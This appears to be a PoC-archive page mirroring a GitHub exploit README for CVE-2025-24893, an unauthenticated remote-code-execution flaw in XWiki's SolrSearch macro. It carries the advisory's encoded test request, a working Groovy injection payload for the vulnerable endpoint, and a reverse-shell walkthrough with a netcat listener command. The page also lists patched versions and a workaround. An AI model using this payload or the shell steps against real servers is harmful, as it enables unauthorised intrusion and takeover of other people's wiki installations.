Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Source
https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC
Associated Vulnerability
Title:Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description:XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Description
CVE-2025-24893 is a critical unauthenticated remote code execution vulnerability in XWiki (versions < 15.10.11, 16.4.1, 16.5.0RC1) caused by improper handling of Groovy expressions in the SolrSearch macro.
Readme
# CVE-2025-24893 - XWiki Unauthenticated RCE Exploit POC

> ⚠️ Unauthenticated Remote Code Execution in XWiki  
> 🛠️ PoC implementation by [@dollarboysushil](https://dollarboysushil.com)

## 💡 Overview

**CVE-2025-24893** is a critical RCE vulnerability in [XWiki](https://xwiki.org), caused by unsafe Groovy expression handling inside the `SolrSearch` macro. An attacker can inject Groovy code through a crafted GET request, leading to **remote code execution** (no authentication required).

- **Severity:** Critical (CVSS 9.8)
- **Affected:** Versions < 15.10.11, 16.4.1, 16.5.0RC1

---

## 🛠 Technical Breakdown

The vulnerability resides in the **`SolrSearch` macro** (`Main.SolrSearch`) of XWiki, which handles search input using unsafe Groovy evaluation. The macro fails to sanitize user-supplied input, allowing for **arbitrary code execution**.

### 🔥 Vulnerable Endpoint

```
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
```

An attacker can inject Groovy code into the `text` parameter, which is evaluated server-side due to improper input handling within the macro system.

### 💥 Example Payload

```text
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}
```

This leads to unauthenticated **Remote Code Execution (RCE)** on vulnerable XWiki instances.

### 🔬 Proof-of-Concept (PoC) Demonstration

#### 🧪 Target Environment

The vulnerable target is an XWiki instance running version `15.10.8`, which is affected by CVE-2025-24893.

![Vulnerable XWiki Interface](images/image.png)

---

#### 📡 Preparing the Listener

Start a Netcat listener on the attacker's machine to capture the reverse shell connection:

```bash
nc -lvnp 1337
```

![Netcat Listener Active on Port 1337](images/image1.png)

---

#### 🚀 Launching the Exploit

Run the exploit script `CVE-2025-24893-dbs.py` to deliver the Groovy-based RCE payload to the vulnerable XWiki endpoint.

![Running Exploit Script](images/image2.png)

---

#### 💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

![Reverse Shell Acquired](images/image3.png)

---

### 📚 References

- OffSec Blog: [CVE-2025-24893 XWiki Groovy RCE](https://www.offsec.com/blog/cve-2025-24893/)
- NVD Entry: [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →